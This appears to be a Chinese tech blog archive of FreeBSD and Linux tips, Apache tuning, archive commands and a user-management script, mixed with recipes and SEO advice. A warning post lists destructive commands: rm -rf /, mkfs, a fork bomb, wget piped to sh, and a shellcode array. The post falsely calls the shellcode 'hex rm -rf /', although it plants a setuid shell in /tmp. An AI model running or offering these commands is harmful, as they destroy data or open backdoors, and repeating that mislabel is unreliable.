我把第二项改成 8-18/2 这代表在 8 小时到 18 小时之间每 2 小时,也相当于 8,10,12,14,16,18 的作用
74.使用portsnap更新系统ports
portsnap从6.0开始引进系统,给与用户方便的更新系统ports
portsnap的命令比较少,fetch 获取数据,extract 释放全部ports,update 更新ports
第一次使用可以portsnap fetch extract,以后使用可以portsnap fetch update
国内镜像站
portsnap.hshh.org
portsnap2.hshh.org
portsnap3.hshh.org (网通)
使用方法:
/etc/portsnap.conf 里面更改
SERVERNAME=portsnap.hshh.org
使用portupgrade 更新已安装的软件
75.清屏
clear或ctrl+L
76.freebsd 怎么安装GF4 MX 440的显卡
首先更新ports和src,到/usr/ports/x11/nvidia-driver下make install clean,要选中linux的支持。
然后到/usr/ports/x11/nvidia-xconfig下make install clean,还可以到/usr/ports/x11/nvidia-settings下安装控制面板。
运行nvidia-xconfig会自动生成xorg.conf文件,然后根据需要自行更改。
77.如何知道一个文件属于哪个port,比如libplds4.so.1
pkg_info -W filename
78.mplayer
cd /usr/ports/multimedia/mplayer
make install clean
问题:如何让mplayer支持srt格式的字幕?
解答:首先复制一个中文ttf字体文件到 ~/.mplayer/ 目录下,并改名为 subfont.ttf ;然后在gmplayer的选项
(Preferences)->Subtitle & OSD 中将 Encoding 项选为“Simplified Chinese charset (CP936)”。如果你还
使用命令行播放电影,还需要在 ~/.mplayer/config 文件中加上这么一行:subcp=cp936 。如果仍然不能
显示字幕,请看看字幕文件名和电影文件名是否相配:如果avi文件是movie.avi的话,字幕文件名应该是movie.srt。
问题:怎么mplayer不能显示.idx+.rar格式的字幕?
解答:先将rar文件中的sub文件解压出来 。
问题:如何让mplayer的播放窗口保持在最前面?
解答:修改 ~/.mplayer/config 文件,加上这么一行:ontop=yes 。
问题:如何让mplayer的画面随窗口大小自动缩放呢?
解答:修改 ~/.mplayer/config 文件,加上这么一行:zoom=yes。
测试通过by tds 061119。fb61+xorg6.9+xfce4+gmplayer
79.设置控制台高分辩率
1.在内核配制文件里加入下面的编译内核
options VESA
options SC_PIXEL_MODE
第一行选项让内核支持VESA 2,第二行让内核支持控制台图形模式。
2.vidcontrol -i mode 查询出所有模式
……
279 (0x117) 0x0000000f G 1024x768x16 1 8×16 0xa0000 64k 64k 0xd8000000 65536k
280 (0x11 0x0000000f G 1024x768x32 1 8×16 0xa0000 64k 64k 0xd8000000 65536k
……
3.测试模式
vidcontrol MODE_280
4.vi /etc/rc.conf加入下面这条
allscreens_flags=”MODE_280″
5.把console改成黑底绿字的
vidcontrol green
80.设置FreeBSD console下的字体大小
vidcontrol -f …
81.锁住终端
lock -np
-n 永不超时,-p 使用系统密码作为开启终端的密匙
82.刻录CD ISO映像文件
burncd -f /dev/acd0 -s max data imagefile.iso fixate
刻录一个文件到CD上而不创建ISO9660文件系统
burncd -f /dev/acd1 -s 12 data archive.tar.gz fixate
生成ISO文件
mkisofs -o imagefile.iso /path/to/tree
把数据CD复制成一个与之等价的镜像文件
dd if=/dev/acd0 of=file.iso bs=2048
83.类似flashget的东东download for X,d4x
/usr/ports/ftp/downloader
84.使用watch监视终端
1.编辑核心加入pseudo-device snp或者kldload snp
2.cd /dev ./MAKEDEV snp0 snp1
3.watch ttyp1
去换终端ctrl-x
退出watch ctrl-g
85.kldload xxx 加载xxx模块
kldstat 查看已加载的模块
kldunload xxx 从核心中移除
86.让程序读取新的配置文件
kill -HUP 199 (进称号)
killall -HUP sshd (进程名)
上述指令中的参数 -HUP 也可以使用 -1 来取代
87.登入后的讯息Message Of The Day(motd)
编辑 /etc/motd 来制作自己的画面
登入前的讯息
修改 /etc/gettytab 及 /etc/issue
编辑 /etc/gettytab,找到 default的地方。
default:\:cb:ce:ck:lc:fd#1000:im=\r\n%s/%m (%h) (%t)\r\n\r\n:sp#1200:\
:if=/etc/issue:
其中的%s %m %h %t分别对应到FreeBSD i386 example.com ttyp0,如果你不想显示FreeBSD,
就把%s拿掉。最后一行if=/etc/issue就是表如果没有issue这个档的话,就执行default。
88.变更自己所使用的Shell
chsh -s /bin/tcsh
上述指令将Shell变更成/bin/tcsh。注意!输入的shell名称一定要存在于/etc/shells中
89.Shell 的环境变量
tcsh可以使用setenv看目前所有的环境变量,也可以使用setenv来改变一个环境变量的值
setenv EDITOR ee
如果您使用的是 Bourne Shell:
export EDITOR=”ee”
90./etc/master.passwd 介绍
FreeBSD使用shadow password的方式来保护密码文件,只有root才可以读取编码后的密码文件
/etc/master.passwd。但是这并不是系统用来验证的档案,为了加快速度,FreeBSD将该文件
做成数据库/etc/spwd.db及/etc/pwd.db,因此在修改完master.passwd后,必须使用指令
pwd_mkdb来将master.passwd做成数据库档案。不过一般而言,我会使用vipw这个指令来修改
master.passwd,vipw会先将master.passwd以预设的文书编辑软件打开,修改完存盘后,
它会视需要自动更新数据库。
pwd_mkdb -p -d /etc /etc/master.passwd
master.passwd这个档案内容中,每个使用者都是独立的一行,每个字段使用冒号分开,格式是:
name:password:UID:GID:class:change:expire:fullname:home:shell
pwd_mkdb介绍
如果我们直接以文书编辑软件来修改/etc/master.passwd,在修改完后,必须执行pwd_mkdb
来将更新的数据做成系统可以读取的数据库文件。pwd_mkdb还会自动建立/etc/passwd。
91.将使用者目录拥有者更改为所属的使用者
chown -R user:group /home/user
使用参数-R将目录user及其下所有档案及子目录的拥有人改变成user
92.记录使用者指令
修改 /etc/rc.conf,加上下列一行设定:
accounting_enable=”YES”
系统会将使用者的历程记录在/var/account/acct*中,最新的记录是acct
当下达指令lastcomm时,则系统会以/var/account/acct为参考,印出所记录的数据。
也可以使用lastcomm -f acct1来查看前一天的资料。
93.sudo
如果你希望它能将执行sudo的log记下来的话,必须先编辑/usr/ports/security/sudo/Makefile,
将CONFIGURE_ARGS中的参数 –disable-log-wrap 拿掉。
cd /usr/ports/security/sudo
make install clean
安装完后,我们要先执行/usr/local/sbin/visudo以设定sudo的设定档(/usr/loca/etc/sudoers)
设定完后,使用者即可执行sudo <允许的指令>,使用者只要输入自己的密码即可,不必知道root密码,
而且5分钟内再次执行sudo时不需再输入密码。如果你有打开log记录功能,sudo执行成功或失败的log
都将被记录到/var/log/sudo.log中。
94./usr/ports/dns/ddclient动态dns更新软件
95.SCSI工具camcontrol
camcontrol devlist 查看目前所有USB装置
ATA工具
atacontrol list 查看目前所有ATA装置
96.如果我们只知道一个关键词,却不知要使用哪一个指令,我们可以使用参数k来查询。
例如我们要查询 firewall 相关的指令:man -k firewall
97.bg
将指定的程序放入背景中执行。当我们下达一个指令后,必须要等待该程序结束后才能输入下一个命令。
如果该程序必须执行一段很长的时间,我们不想等程序结束,可以把它放到背景中执行。在下达指令后,
按 Ctrl+Z 来暂停程序,接着再执行 bg 即可将程序放到背景中执行。
$ sleep 1000
^Z
Suspended
$ bg
[1] sleep 1000 &
我们也可以在所要执行的指令后面加上符号 “&”,就可以将该程序放到背景执行:
$ sleep 1000 &
[2] 46461
98.jobs
jobs 指令可以让我们查询目前有哪些程序在背景执行。如果加入参数 -l 可以得到 PID 的信息。
jobs -l
[1] + 46459 Running sleep 1000
[2] – 46461 Running sleep 1500
99.fg
将指定的程序放到前景中执行。我们使用jobs看到目前在背景执行的程序之后,可以使用fg把它叫回前景。
例如要叫回第一个在背景中执行的程序:
fg %1
sleep 1000
100.sync
让系统暂存的数据强制存回硬盘
101.cp -Rp sourdir tardir
-R完成递归复制(即可以复制目录以下的所有内容),-p保留文件的时间、所属等等
102.ssh username@hostname
从远程拷贝 scp user@host:/path/to/files local_file_name
拷贝到远程 scp local_file_name user@host:/path/to/files
103.使用Portaudit监视第三方安全问题
cd /usr/ports/security/portaudit && make install clean
安装完成之后更新数据库
portaudit -Fda
使用下面的命令对通过Ports Collection安装的第三方软件工具进行审计
portaudit -a
104.我要怎么从 X 切换到 virtual consoles?
请用Ctrl+Alt+Fn以切回至console。Ctrl+Alt+F1可以切回至第一个console。
当你切回至文字console后,你就可以使用一般的Alt+Fn组合键在各console之间切换了。
要回到X的话,你就可以使用Alt+F9以返回至X中。
105.FB下Free的杀毒软件
clamav (security/clamav)
man clamscan 扫描
man freshclam 更新病毒库
man clamd
man clamdscan
man sigtool
配置文件
/use/local/etc/freshclam.conf
/usr/local/etc/clamd.conf
把conf里的#Example去掉
# Comment or remove the line below.
#Example
/etc/rc.conf加入
clamav_clamd_enable=”YES”
clamav_freshclam_enable=”YES”
106.软件默认配置示例文件的一般存放位置
/usr/share/examples
/usr/local/share/examples
107.安装文泉驿字体
cd /usr/ports/x11-fonts/wqy/
make install clean
108.把/data/tftp打包成pxeinstfb62.tgz
cd /data/
tar zcvf pxeinstfb62.tgz tftp
解压
tar zxvf pxeinstfb62.tgz
109.ports下有没有xxx这个软件?在哪个目录下?
回答:有两种办法来查找,一是通过软件名:
make fetchindex
cd /usr/ports
make search name=xxx | grep ^Path
另一种是通过关键字,也就是在软件名和说明中只要包括这个单词的都会查找出来:
cd /usr/ports
make search key=xxx | grep ^Path
110.FreeBSD如何获得硬件信息?
sysctl -a | grep “^dev\.”
pciconf -lv
1.axel加速下载
#cd /usr/ports/ftp/axel
#make install
#修改/et/make.conf
#vi /etc/make.conf
##加入以下内容
FETCH_CMD=axel
FETCH_BEFORE_ARGS= -n 10 -a
FETCH_AFTER_ARGS=
DISABLE_SIZE=yes
MASTER_SITE_OVERRIDE?=\
http://ports.hshh.org/${DIST_SUBDIR}/\
http://ports.cn.freebsd.org/${DIST_SUBDIR}/\
ftp://ftp.freeBSDchina.org/pub/FreeBSD/ports/distfiles/${DIST_SUBDIR}/
MASTER_SITE_OVERRIDE?=${MASTER_SITE_BACKUP}
2.安装vim
cd /usr/ports/editor/vim
make install clean
配置
# #echo “syntax on”>>/root/.vimrc
# #echo “alias vi vim” >>/root/.cshrc
3.像linux一样显示颜色
#vim /etc/csh.cshrc
#加入如下
setenv LSCOLORS ExGxFxdxCxegedabagExEx
setenv CLICOLOR yes
source /etc/csh.cshrc
4.命令行补齐功能
在/etc/csh.cshrc中加入:
set autolist
5.内核优化
# vim /boot/loader.conf加入如下文本
kern.dfldsiz=”2147483648″
kern.maxdsiz=”2147483648″
kern.ipc.nmbclusters=”0″
kern.ipc.nsfbufs=”66560″
解释:
a、第一、二行主要是为了突破1G内存设置的。
b、第三行其实是bsd的一个bug,当系统并发达到一个数量级的时候,系统会crash,这个是非常糟糕的事情。所幸更改了这个参数后,在高并发的时候,基本可以没有类似情况,当然非常bt的情况,还得进一步想办法。
c、第四行是读取的文件数,如果你下载的文件比较大,且比较多,加大这个参数,是非常爽的。
Sysctl修改方法如下:
#vi /etc/rc.local
sysctl kern.ipc.maxsockets=100000 ##增加并发的socket,对于ddos很有用
sysctl kern.ipc.somaxconn=65535 ##打开文件数
sysctl net.inet.tcp.msl=2500 ##timeout时间
6.使用修改网络配置立即生效
sh /etc/rc
7.查看基本配置信息
①查看CPU:
sysctl hw.model hw.ncpu
dmesg | grep “CPU:”
②查看内存:
dmesg | grep “real memory” | awk -F ‘[( )]’ ‘{print $2,$4,$7,$8}’
查看swap:
top | grep “Swap:” | awk ‘{print $1,$2}’
③查看硬盘:
diskinfo -vt /dev/ad0
④看硬盘大小及硬件使用情况:
dmesg | grep “sector” | awk ‘{print $1,$2}’
df -h
⑤查看服务器品牌:
dmesg | grep “ACPI APIC”
⑥查看系统内核,命令跟Linux下一样:
uname -a
mail# uname -a
FreeBSD mail.cn7788.com 8.0-RELEASE FreeBSD 8.0-RELEASE #0:
FreeBSD系统root密码解决方法
忘记FreeBSD系统root密码解决方法
一、 开机进入 single mode
二、然后输入fsck
三、mount -a
四、passwd root
下边新设root密码即可。
2012年12月15日星期六
芝兰斋糕干的做法详细介绍
工艺:蒸法
芝兰斋糕干的制作材料:
小站稻米、糯米、豆沙馅、松子仁、瓜子仁、核桃仁、青梅、瓜条、橘皮、青红丝等各适量。
芝兰斋糕干的介绍:
芝兰斋糕干是用小站稻米、糯米磨粉夹入多种馅料蒸制而成。因该糕干系芝兰斋字号创制,故名。芝兰斋创始人于天津沈庄大街开店制售糕干,因产品质佳价廉,颇受人们喜欢,以致成为农历正月人们最喜欢的食品,并传承至今,成为特色小吃之一,它和一般糕类的区别是糕内有馅。
芝兰斋糕干的特色:
米面松软洁白,馅心任意配制,入口柔软而筋道,不噎口,不粘牙,越嚼越香,凉热皆宜。
教您芝兰斋糕干怎么做,如何做芝兰斋糕干
1.稻米、糯米用清水浸泡至回软,上磨磨成米粉。 2.松子仁、瓜子仁、核桃仁、青梅、瓜条、橘皮、青红丝皆切成碎粒。
3.取制糕的木模,先在模内装入一层米粉,然后加一层豆沙馅料,再加入米粉抹平,然后用刀划上小长方块,撒上松子仁、瓜子仁、核桃仁、青梅、瓜条、橘皮、青红丝,入预热的蒸锅中蒸10分左右至熟透即成。
芝兰斋糕干的制作要领:
1.选料必须严格,要用上好的大米与糯米,米粉细腻无粗粒;
2.馅心可随意调制。
3.蒸时用旺火,气足蒸之。
合理设置apache参数
在/usr/local/etc/apache22/httpd.conf中加载MPM配置(去掉前面的注释):
# Server-pool management (MPM specific)
Include etc/apache22/extra/httpd-mpm.conf
可见的MPM配置在/usr/local/etc/apache22/extra/httpd-mpm.conf,但里面根据httpd的工作模式分了很多块,哪一部才是当前httpd的工作模式呢?可通过执行 apachectl -l 来查看:
Compiled in modules:
core.c
prefork.c
http_core.c
mod_so.c
看到prefork 字眼,因此可见当前httpd应该是工作在prefork模式,prefork模式的默认配置是:
<IfModule mpm_prefork_module>
StartServers 5
MinSpareServers 5
MaxSpareServers 10
MaxClients 150
MaxRequestsPerChild 0
</IfModule>
2.要加到多少?
连接数理论上当然是支持越大越好,但要在服务器的能力范围内,这跟服务器的CPU、内存、带宽等都有关系。
查看当前的连接数可以用:
ps aux | grep httpd | wc -l
或:
pgrep httpd|wc -l
计算httpd占用内存的平均数:
ps aux|grep -v grep|awk ‘/httpd/{sum+=$6;n++};END{print sum/n}’
由于基本都是静态页面,CPU消耗很低,每进程占用内存也不算多,大约200K。
服务器内存有2G,除去常规启动的服务大约需要500M(保守估计),还剩1.5G可用,那么理论上可以支持1.5*1024*1024*1024/200000 = 8053.06368
约8K个进程,支持2W人同时访问应该是没有问题的(能保证其中8K的人访问很快,其他的可能需要等待1、2秒才能连上,而一旦连上就会很流畅)
控制最大连接数的MaxClients ,因此可以尝试配置为:
<IfModule mpm_prefork_module>
StartServers 5
MinSpareServers 5
MaxSpareServers 10
ServerLimit 5500
MaxClients 5000
MaxRequestsPerChild 100
</IfModule>
注意,MaxClients默认最大为250,若要超过这个值就要显式设置ServerLimit,且ServerLimit要放在MaxClients之前,值要不小于MaxClients,不然重启httpd时会有提示。
重启httpd后,通过反复执行pgrep httpd|wc -l 来观察连接数,可以看到连接数在达到MaxClients的设值后不再增加,但此时访问网站也很流畅,那就不用贪心再设置更高的值了,不然以后如果网站访问突增不小心就会耗光服务器内存,可根据以后访问压力趋势及内存的占用变化再逐渐调整,直到找到一个最优的设置值。
(MaxRequestsPerChild不能设置为0,可能会因内存泄露导致服务器崩溃)
更佳最大值计算的公式:
apache_max_process_with_good_perfermance < (total_hardware_memory / apache_memory_per_process ) * 2
apache_max_process = apache_max_process_with_good_perfermance * 1.5
2012年12月14日星期五
滋补强壮五款乌鸡药膳
乌鸡的营养价值有哪些?乌鸡味甘,性平。归肝、肾、肺经。具有补肝肾,益气血,退虚热的功效。适用于虚劳羸瘦,骨蒸痨热,消渴,遗精,久泻,久痢。乌鸡怎么做才起到滋补强壮的作用呢?
乌鸡名 乌骨鸡、药鸡,为雉科动物乌骨鸡去羽毛及内脏的全体。《本草纲目》称“乌骨鸡甘平,无毒。补虚劳羸弱,治消渴中恶,鬼击心腹痛,益产妇,治妇人崩中带下, 虚损诸病,大人小儿下痢噤口”。乌鸡味甘,性平。归肝、肾、肺经。具有补肝肾,益气血,退虚热的功效。适用于虚劳羸瘦,骨蒸痨热,消渴,遗精,久泻,久 痢。
现代药理研究证实,乌鸡主要含有天冬氨酸、谷氨酸、赖氨酸等多种氨基酸,还含有铜、锌、锰等元素、胡萝卜素、维生素E、乌鸡黑素等。实验研究表明,乌鸡具有滋补强壮、延缓衰老、抗诱变、增强非特异性免疫功能等作用。
【适用人群】适合一切体虚血亏、肝肾不足、脾胃不健的人食用。
【适用量】每次150克。
【特别提示】乌鸡连骨(砸碎)熬汤滋补效果最佳。炖煮时最好不用高压锅,使用砂锅文火慢炖最好。
现介绍几款滋补强壮药膳,可作为病后体虚、年老体弱、体质素虚者调补之用。
乌鸡大枣粥
材料:乌鸡肉150克,大枣10~15枚,大米100克,精盐适量。
做法:将乌鸡肉洗净,切成碎末;大枣、大米洗净。
将乌鸡肉与大枣、大米一同放入锅中,加入清水适量,上大火烧开,改用小火熬成粥,调入少许精盐即成。
每日早晚温服。
功效:本粥具有养血止血、健脾补中的功效。
适用于气血津液不足、营卫不和、心悸怔忡、脾虚便溏、产后或久病血虚体弱等症。
笋菇炒乌鸡
材料:乌鸡肉300克,冬笋、黄瓜各50克,水发香菇25克,鸡蛋1个,植物油、酱油、料酒、花椒水、精盐、水淀粉、味精、清汤各适量。
做法:将乌鸡肉洗净,切成薄片,与鸡蛋清和水淀粉拌匀;将冬笋、香菇、黄瓜切成片。将炒锅烧热,放适量油,待油烧至六成热时,下入乌鸡肉片、香菇、黄瓜片、冬笋翻炒,加入清汤、料酒、酱油、精盐、味精、花椒水,炒熟即可。佐餐食用。
功效:本品具有补养五脏,增强体质,防病延年的功效。适用于五脏虚衰。
冻豆腐西红柿炖乌鸡
材料:冻豆腐200克,净白条乌鸡1只,西红柿100克,植物油、料酒、精盐、味精、葱花、姜丝、鲜汤各适量。
做法:将冻豆腐解冻,洗净,压去水分,切薄片;净乌鸡切成块,投入开水锅中汆去血水捞出,控净水;西红柿切成块。锅上火,放入植物油,烧至七八 成热,投入葱花、姜丝爆出香味,放入乌鸡块煸炒片刻,加入料酒、鲜汤,烧开后撇去浮沫,改用小火炖至熟烂,放入精盐、冻豆腐块,继续炖5分钟,再放入西红 柿和味精,烧开,即可出锅。佐餐食用。
功效:本品具有补虚强身的功效。适用于病后体虚、年老力衰、骨质疏松等症。
当归党参炖乌鸡
材料:乌鸡1只,当归、党参各15克,葱、姜、料酒、精盐各适量。
做法:将当归、党参分别洗净;将乌鸡除内脏,把当归、党参、葱、姜、料酒、精盐放入乌鸡腹内,将乌鸡放入锅内,加水适量,置大火上烧沸,改用小火炖至乌鸡肉熟烂。吃乌鸡肉,喝汤。
功效:本品具有益气养血,补虚强身的功效。适用于血虚体弱、气虚乏力、四肢困倦、脾虚食少等症。
太子参炖乌鸡
材料:太子参10克,全当归10克,乌骨鸡1只,制何首乌15克,葱20克,生姜10克,料酒10毫升,盐3克。
做法:将乌骨鸡宰杀后,去毛、肠杂及爪,洗净,待用;将太子参、全当归、制何首乌洗净,放入纱布袋,置沙锅中,加水2000毫升,武火烧开后,改用文火煎煮30分钟,捞去纱布袋,投入乌骨鸡、葱段、生姜片、料酒、盐,加盖焖煮至酥烂即成。
功效:本品具有温中益气,补精填髓的功效。适用于脏器下垂、贫血、慢性肝炎、病后虚弱的辅助治疗。湿盛中满,大便泄泻者慎用。
如何让百度收录你网站的图片之百度图片收录规则
百度图片收录规则
1.百度图片的热门目录: 爆笑趣图、精品推荐、MM明星、卡通动漫、精美壁纸、电影电视、风景名胜、新闻图片、壁纸。
2.百度图片会根据图片关键字的等级收录排前。
第1级:搜索结果的关键字在图片所存在页面的title中存在将会优前排前(即使图片没有alt也会排前)。
第2级:百度图片会考虑收录图片代码中有alt注释的图处。
第3级:在搜索结果很少的情况下将考虑把一些title、alt中没有关键字的图片但网页内容中出现搜索关键字的图片。
3.百度图片搜索结果会优先把jpg、jpeg放在前面,(指定搜索其实格式除外)。
4.默认搜索结果百度图片喜欢把大图放在搜索结果前面。
大图片: 指图片的最长一边大于 640 像素的图片(包括 640 像素)。
小图片: 指图片的最长一边小于 200 像素的图片(包括 200 像素)。
中图片: 图片的最长一边在大于 200 像素并小于 640 像素之间的图片。
5.百度图片大多优先收百度空间里的图片。
百度喜欢到有权重的图片网站,或是喜欢到论坛、社区收录图片,对文章内的图片不怎么收录。
6.真人图、真景图排在前面,卡通动漫图排在后面,(主要取决于图片的alt与title或人工)
7.图片没有排名,不会收录后一直不换而排到前面,如果相同关键词的图片很多,百度就会常更换图片,而使用户感觉换然一新。
搜索自己的图片是否被百度图片收录的方法:
打开http://image.baidu.com 输入site:www.8×5.net,即可看到有多少篇图片被百度收录。
让百度图片有效地收录你的图片的方法:
1、在图片alt,title,里填写图片关键词关键词。
2、申请百度空间,把图片放在百度空间相册里。(标题就写你想要被收录的关键词,再让关键词在内容部分多出现几次就搞定了,一般24小时内通过关键词就可以看到你所发布的图片了。)
相关的名称解释:
什么是图片alt属性?
图片alt属性是用来说明图片的内容的,我们经常浏览网页时候,把鼠标放在某个图片上停留一下,会看到弹出一个小的提示,上面写着一些文字。这种就是图片alt属性设置的。给图片加alt说明对于搜索引擎是友好的,而且对于网站优化也是有好好处的。不要将图片alt属性中充满了关键词,重复关键词也是不可取的,容易被判为Spam垃圾信息。alt属性不要写不相关的内容,alt属性中可以加1-2个关键词,然后再加一些描述。
什么是title属性?
title属性其实我们经常会看到,当把鼠标放在一个文字链接上时,会弹出一段说明信息,这种提示信息就是通过title属性设置的。不光文字链接有title属性,图片也可以设置title属性。
图片title属性和图片alt属性区别?
图片title属性是不管图片是否存在,该提示都会显示,而alt属性只有当图片不存在或者没有完全打开时才会显示。另外还有在ie6浏览器下,如果一个图片没有title属性,有img alt属性,鼠标放在图片上也会有title属性那样的效果(都有提示信息),不过这个是因为ie浏览器不标准的原因,firefox下就不会出现那样的情况了。
title属性内容如何写?
1、在定义img对象时,最好将alt 描述内容和title属性描述内容都写全,保证在各种浏览器中都能正常使用
2、不要在alt 描述和title属性中堆积关键字,否则可能会导致搜索引擎惩罚
3、在alt 描述和title中包含关键字,并且二者内容最好不一样
2012年12月10日星期一
调整IMG文件大小的方法
1、先用EasyBoot制作一个新的IMG文件
2、例如我选择了制作一个10M的IMG文件(影像大小那里选择10080就是10M了)。种子影像文件可惜选择EasyBoot里面自带的setup98.img
然后用WinImage软件打开刚才创作的10080.img文件,在WinImage的选项=》设置,在载入到内存的影像的大小限制里面填写上28800。一定要填写上比文件大的数字,或者和文件一样大小也可以。
PS:【这项很重要,一定要填写好,否则制作出的IMG无法启动。】
在红色的箭头位置填写每簇扇区数(大小为字节)=》4(2048)
磁头=》4
其他地方不要修改,否则无法启动,扇区总数那里除非是调整IMG文件容量,否则也不要改动,因为数字有严格限制,填错了也无法启动。
最后的工作就是往IMG文件里面添加可启动的DOS引导文件了,要记住先后顺序。
1、IO.SYS
2、MSDOS.SYS
3、Command.com
添加完这3个文件后保存一下,后面就可以引导启动这个IMG文件了。
现在就可以继续打开这个IMG文件往里面任意添加其他你所需要的文件了。
2012年12月6日星期四
Linux删除某一个目录下所有指定文件名的文件
find /home/kevin/test -name *.txt -exec rm -f {} \;
find 是一个强大的搜索命令 -name 选项用来搜索符合条件的文件 搜到之后用-exec 选项来执行命令rm -rf {}进行删除.
2012年12月5日星期三
7 个致命的 Linux 命令
如果你是一个 Linux 新手,在好奇心的驱使下,可能会去尝试从各个渠道获得的命令。以下是 7 个致命的 Linux 命令,轻则使你的数据造成丢失,重则使你的系统造成瘫痪,所以,你应当竭力避免在系统中运行它们。
1、rm -rf / 此命令将递归并强制删除 / 目录下的所有文件。
2、
char esp[] __attribute__ ((section(“.text”))) /* e.s.p
release */
= “\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68”
“\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99”
“\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7”
“\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56”
“\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31”
“\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69”
“\x6e\x2f\x73\x68\x00\x2d\x63\x00”
“cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;”;
这是 rm -rf / 的 hex(十六进制)版本,很能迷惑 Linux 用户。
3、mkfs.ext3 /dev/sda 这将对硬盘进行重新格式化,自然,硬盘上的所有数据将灰飞烟灭。
4、:(){ :|:& };: 著名的 fork 炸弹,此命令将告诉你的系统执行海量的进程,直到你的系统僵死。
5、any_command > /dev/sda 使用该命令,原始数据将被写到块设备,其结果是造成数据丢失。
6、wget http://some_untrusted_source -O- | sh 不要从不信任的地方下载东西,这可能会获取恶意代码。
7、mv /home/yourhomedirectory/* /dev/null 此命令将移动主目录中的所有文件到一个不存在的地方,你将再也看不到那些文件。
2012年12月3日星期一
linux 解压命令总结
.tar
解包:tar xvf FileName.tar
打包:tar cvf FileName.tar DirName
(注:tar是打包,不是压缩!)
———————————————
.gz
解压1:gunzip FileName.gz
解压2:gzip -d FileName.gz
压缩:gzip FileName
.tar.gz 和 .tgz
解压:tar zxvf FileName.tar.gz
压缩:tar zcvf FileName.tar.gz DirName
———————————————
.bz2
解压1:bzip2 -d FileName.bz2
解压2:bunzip2 FileName.bz2
压缩: bzip2 -z FileName
.tar.bz2
解压:tar jxvf FileName.tar.bz2
压缩:tar jcvf FileName.tar.bz2 DirName
———————————————
.bz
解压1:bzip2 -d FileName.bz
解压2:bunzip2 FileName.bz
压缩:未知
.tar.bz
解压:tar jxvf FileName.tar.bz
压缩:未知
———————————————
.Z
解压:uncompress FileName.Z
压缩:compress FileName
.tar.Z
解压:tar Zxvf FileName.tar.Z
压缩:tar Zcvf FileName.tar.Z DirName
———————————————
.zip
解压:unzip FileName.zip
压缩:zip FileName.zip DirName
———————————————
.rar
解压:rar x FileName.rar
压缩:rar a FileName.rar DirName
rar请到:http://www.rarsoft.com/download.htm 下载!
解压后请将rar_static拷贝到/usr/bin目录(其他由$PATH环境变量指定的目录也可以):
[root@www2 tmp]# cp rar_static /usr/bin/rar
———————————————
.lha
解压:lha -e FileName.lha
压缩:lha -a FileName.lha FileName
lha请到:http://www.infor.kanazawa-it.ac.jp/~ishii/lhaunix/下载!
>解压后请将lha拷贝到/usr/bin目录(其他由$PATH环境变量指定的目录也可以):
[root@www2 tmp]# cp lha /usr/bin/
———————————————
.rpm
解包:rpm2cpio FileName.rpm | cpio -div
———————————————
.deb
解包:ar p FileName.deb data.tar.gz | tar zxf –
———————————————
.tar .tgz .tar.gz .tar.Z .tar.bz .tar.bz2 .zip .cpio .rpm .deb .slp .arj .rar .ace .lha .lzh .lzx .lzs .arc .sda .sfx .lnx .zoo .cab .kar .cpt .pit .sit .sea
解压:sEx x FileName.*
压缩:sEx a FileName.* FileName
sEx只是调用相关程序,本身并无压缩、解压功能,请注意!
sEx请到: http://sourceforge.net/projects/sex下载!
解压后请将sEx拷贝到/usr/bin目录(其他由$PATH环境变量指定的目录也可以):
[root@www2 tmp]# cp sEx /usr/bin/
gzip 命令
减少文件大小有两个明显的好处,一是可以减少存储空间,二是通过网络传输文件时,可以减少传输的时间。gzip 是在 Linux 系统中经常使用的一个对文件进行压缩和解压缩的命令,既方便又好用。
语法:gzip [选项] 压缩(解压缩)的文件名
该命令的各选项含义如下:
-c 将输出写到标准输出上,并保留原有文件。
-d 将压缩文件解压。
-l 对每个压缩文件,显示下列字段:
压缩文件的大小;未压缩文件的大小;压缩比;未压缩文件的名字
-r 递归式地查找指定目录并压缩其中的所有文件或者是解压缩。
-t 测试,检查压缩文件是否完整。
-v 对每一个压缩和解压的文件,显示文件名和压缩比。
-num 用指定的数字 num 调整压缩的速度,-1 或 –fast 表示最快压缩方法(低压缩比),
-9 或–best表示最慢压缩方法(高压缩比)。系统缺省值为 6。
指令实例:
gzip *
% 把当前目录下的每个文件压缩成 .gz 文件。
gzip -dv *
% 把当前目录下每个压缩的文件解压,并列出详细的信息。
gzip -l *
% 详细显示例1中每个压缩的文件的信息,并不解压。
gzip usr.tar
% 压缩 tar 备份文件 usr.tar,此时压缩文件的扩展名为.tar.gz。
linux下创建/删除用户
#/bin/bash
del_user() {
echo “请输入用户名:”
read user
echo “请确认是否删除(y/n)?”
read isDel
if [ $isDel = ‘y’ ]; then
userdel -r $user
echo -e “\t\t\t\t|——————————|”
echo -e “\t\t\t\t|——- 用户 ‘$user’ 已删除 ——|”
echo -e “\t\t\t\t|——————————|”
fi
}
add_user() {
echo “请输入用户名:”
read user
useradd $user -d /work/$user
passwd $user
echo -e “\t\t\t\t|——————————|”
echo -e “\t\t\t\t|——- 用户 “$user” 已创建 ——|”
echo -e “\t\t\t\t|——————————|”
}
menu() {
while :
do
echo “1.添加用户”
echo “2.删除用户”
echo “0.退出”
echo -e “\n请选择:”
read choice
case $choice in
1) add_user;;
2) del_user;;
0) exit;;
*) menu;;
esac
done
}
menu
Linux Shell 调用系统时间变量
Shell 调用系统时间变量
获取今天时期:`date +%Y%m%d` 或 `date +%F` 或 $(date +%y%m%d)
获取昨天时期:`date -d yesterday +%Y%m%d`
获取前天日期:`date -d -2day +%Y%m%d`
依次类推比如获取10天前的日期:`date -d -10day +%Y%m%d`
或n天前的 `date -d “n days ago” +%y%m%d`
明天:`date -d tomorrow +%y%m%d`
注意以上中间有空格
时间域
% H 小时(00..23)
% I 小时(01..12)
% k 小时(0..23)
% l 小时(1..12)
% M 分(00..59)
% p 显示出AM或PM
% r 时间(hh:mm:ss AM或PM),12小时
% s 从1970年1月1日00:00:00到目前经历的秒数
% S 秒(00..59)
% T 时间(24小时制)(hh:mm:ss)
% X 显示时间的格式(%H:%M:%S)
% Z 时区 日期域
% a 星期几的简称( Sun..Sat)
% A 星期几的全称( Sunday..Saturday)
